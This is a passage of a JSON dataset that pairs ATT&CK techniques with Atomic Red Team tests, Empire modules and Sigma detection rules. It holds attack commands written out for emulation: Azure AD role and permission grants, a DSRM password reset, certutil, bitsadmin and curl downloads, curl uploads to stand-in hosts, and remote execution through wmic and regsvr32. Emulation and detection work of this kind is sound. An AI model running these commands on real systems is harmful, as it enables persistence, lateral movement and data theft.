found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "cleanup_command": "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential -ErrorAction Ignore\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nRemove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "AzureAD - adding permission to application", + "auto_generated_guid": "94ea9cc3-81f9-4111-8dde-3fb54f36af4b", + "description": "The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. 
Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.\nYou can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.\nThe DirectoryRecommendations.Read.All permissions have been selected as the default\n\nThe account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.\n\nDetection hint - check Operation Name \"Add app role assignment to service principal\" in subscriptions Activity Logs.\nYou can also take a look at the materials:\nhttps://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/\nhttps://github.com/reprise99/Sentinel-Queries\nhttps://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766\nhttps://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "application_name": { + "description": "Name of the targed application", + "type": "String", + "default": "test_app" + }, + "application_permission": { + "description": "Permission from Microsoft Graph Resource API that will be add to application", + "type": "String", + "default": "DirectoryRecommendations.Read.All" + } + }, + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" 
-AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq 
$aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "cleanup_command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\nRemove-AzureADApplication -ObjectId $aadApplication.ObjectId\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Password Change on Directory Service Restore Mode (DSRM) Account", + "auto_generated_guid": "d5b886d9-d1c7-4b6e-a7b0-460041bf2823", + "description": "Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sync_account": { + "description": "Account to sync password from", + "type": "String", + "default": "%username%" + } + }, + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "ntdsutil \"set dsrm password\" \"sync from domain account #{sync_account}\" \"q\" \"q\"\n" + } + } + ] + }, + { + "Empire Module": "powershell/management/honeyhash", + "ATT&CK Technique #1": "T1098", + "ATT&CK Technique #2": "", + "Technique": "Account Manipulation", + "Concatenate for Python Dictionary": "\"powershell/management/honeyhash\": [\"T1098\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/set_ad_object", + "ATT&CK Technique #1": "T1098", + "ATT&CK Technique #2": "", + "Technique": "Account Manipulation", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/set_ad_object\": [\"T1098\"]," + } + ], + "queries": [], + 
"possible_detections": [ + { + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "references": [ + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", + "https://adsecurity.org/?p=3466", + "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/" + ], + "author": "@neu5ron", + "tags": [ + "attack.t1098", + "attack.credential_access", + "attack.persistence" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition1": "Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Account Management\\Audit User Account Management", + "definition2": "Requirements: Audit Policy : DS Access > Audit Directory Service Changes, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\DS Access\\Audit Directory Service Changes" + }, + "detection": { + "selection1": { + "EventID": 4738 + }, + "filter1": { + "AllowedToDelegateTo": null + }, + "filter2": { + "AllowedToDelegateTo": "-" + }, + "selection2": { + "EventID": 5136, + "AttributeLDAPDisplayName": "msDS-AllowedToDelegateTo" + }, + "selection3": { + "EventID": 5136, + "ObjectClass": "user", + "AttributeLDAPDisplayName": "servicePrincipalName" + }, + "selection4": { + "EventID": 5136, + "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity" + }, + "condition": "(selection1 and not 1 of filter*) or selection2 or selection3 or selection4" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": 
"The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "references": [ + "https://adsecurity.org/?p=1714" + ], + "author": "Thomas Patzke", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1098" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4794 + }, + "condition": "selection" + }, + "falsepositives": [ + "Initial installation of a domain controller" + ], + "level": "high" + }, + [ + "4624", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "Packet capture" + ], + [ + "API monitoring" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "Packet capture" + ], + [ + "API monitoring" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": 
"process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "group" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "user" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + 
"collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + } + ], + "external_reference": [ + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + 
"https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1105", + "command_list": [ + "rsync -r #{local_path} #{username}@#{remote_host}:/tmp/victim-files\n", + "rsync -r #{local_path} #{username}@victim-host:#{remote_path}\n", + "rsync -r /tmp/adversary-rsync/ #{username}@#{remote_host}:#{remote_path}\n", + "rsync -r #{local_path} victim@#{remote_host}:#{remote_path}\n", + "rsync -r #{username}@#{remote_host}:/tmp/adversary-rsync/ #{local_path}\n", + "rsync -r #{username}@adversary-host:#{remote_path} #{local_path}\n", + "rsync -r #{username}@#{remote_host}:#{remote_path} /tmp/victim-files\n", + "rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}\n", + "scp #{local_file} #{username}@#{remote_host}:/tmp/victim-files/\n", + "scp /tmp/adversary-scp #{username}@#{remote_host}:#{remote_path}\n", + "scp #{local_file} #{username}@victim-host:#{remote_path}\n", + "scp #{local_file} victim@#{remote_host}:#{remote_path}\n", + "scp #{username}@adversary-host:#{remote_file} #{local_path}\n", + "scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/\n", + "scp #{username}@#{remote_host}:/tmp/adversary-scp #{local_path}\n", + "scp adversary@#{remote_host}:#{remote_file} #{local_path}\n", + "sftp #{username}@#{remote_host}:/tmp/victim-files/ <<< $'put #{local_file}'\n", + "sftp #{username}@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'\n", + "sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'\n", + "sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'\n", + "sftp #{username}@adversary-host:#{remote_file} #{local_path}\n", + "sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/\n", + "sftp #{username}@#{remote_host}:/tmp/adversary-sftp 
#{local_path}\n", + "sftp adversary@#{remote_host}:#{remote_file} #{local_path}\n", + "cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}\n", + "cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt\n", + "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }\n", + "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f #{remote_file}\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }\n", + "C:\\Windows\\System32\\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}\n", + "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} %temp%\\Atomic-license.txt\n", + "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}\n", + "(New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\", \"#{destination_path}\")\n", + "(New-Object System.Net.WebClient).DownloadFile(\"#{remote_file}\", \"$env:TEMP\\Atomic-license.txt\")\n", + "pushd \\\\localhost\\C$\necho var fileObject = WScript.createobject(\"Scripting.FileSystemObject\");var newfile = fileObject.CreateTextFile(\"AtomicTestFileT1105.js\", true);newfile.WriteLine(\"This is an atomic red team test file for T1105. 
It simulates how OSTap worms accross network shares and drives.\");newfile.Close(); > AtomicTestT1105.js\nCScript.exe AtomicTestT1105.js //E:JScript\ndel AtomicTestT1105.js /Q >nul 2>&1\ndel AtomicTestFileT1105.js /Q >nul 2>&1\npopd\n", + "copy C:\\Windows\\System32\\cmd.exe C:\\svchost.exe\nC:\\svchost.exe /c echo T1105 > \\\\localhost\\c$\\T1105.txt\n", + "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path #{local_path}\n", + "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url #{remote_file} -path %temp%\\Atomic-license.txt\n", + "timeout --preserve-status #{timeout} whois -h localhost -p #{remote_port} \"#{query}\" > #{output_file}\n", + null, + "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"#{query}\" > /tmp/T1105.whois.out\n", + "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"Hello from Atomic Red Team test T1105\" > #{output_file}\n", + "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File #{output_file}; Invoke-Item #{output_file}\n", + "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt\n", + "finger base64_filedata@localhost\n", + "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml\n", + "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled #{remote_url}\n", + "#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o 
c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\programdata\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\\allthethingsx64.dll\n", + "C:\\Windows\\System32\\Curl.exe -k #{file_download} -o c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} --output c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} -o c:\\programdata\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} -o %Temp%\\allthethingsx64.dll\n", + "C:\\Windows\\System32\\Curl.exe -T #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe --upload-file #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe -d #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe --data #{file_path} #{remote_destination}\n", + "#{curl_path} -T #{file_path} www.example.com\n#{curl_path} --upload-file #{file_path} www.example.com\n#{curl_path} -d #{file_path} www.example.com\n#{curl_path} --data #{file_path} www.example.com\n", + "#{curl_path} -T c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} --upload-file c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} -d c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} --data c:\\temp\\atomictestfile.txt #{remote_destination}\n", + "PathToAtomicsFolder\\T1105\\src\\T1105.bat 1>NUL \n", + "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = 
\"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"$env:comspec\" \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" \"\\\\$machine\\#{remote_drive_letter}$\\Windows\\Temp\\T1105.exe\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:\\Windows\\Temp\\T1105.exe\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" \"\\\\$machine\\C$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i C:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "del %TEMP%\\PrintBrm.zip >nul 2>&1 \n#{Path_PrintBrm} -b -d \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\ -f %TEMP%\\PrintBrm.zip -O FORCE\n", + "del %TEMP%\\PrintBrm.zip >nul 2>&1 \nC:\\Windows\\System32\\spool\\tools\\PrintBrm.exe -b -d #{Path_unc} -f %TEMP%\\PrintBrm.zip -O FORCE\n", + "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} 
PathToAtomicsFolder\\T1105\\src\\redcanary.cab %TEMP% /A\n", + "del %TEMP%\\redcanary.cab >nul 2>&1\nC:\\Windows\\System32\\replace.exe #{replace_cab} %TEMP% /A\n", + "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\redcanary.cab %TEMP% /A\n", + "$wc=New-Object System.Net.WebClient;\n$output=\"PowerShellCore.msi\";\n$wc.DownloadFile(\"https://github.com/PowerShell/PowerShell/releases/download/v6.2.2/PowerShell-6.2.2-win-x64.msi\", $output);\nStart-Process msiexec.exe -ArgumentList \"/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1\" -Wait;\n$env:Path += \";C:\\Program Files\\Powershell\\6\";\nStart-Process pwsh -ArgumentList \"-c #{location} -server #{server} - group #{group}\" -WindowStyle hidden;\n", + "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadFile(\"https://download.sysinternals.com/files/PSTools.zip\", \"PSTools.zip\");\nNew-Item -ItemType \"directory\" C:\\Windows\\System32\\PSTools -Force;\nAdd-Type -Assembly 'System.IO.Compression.FileSystem'; 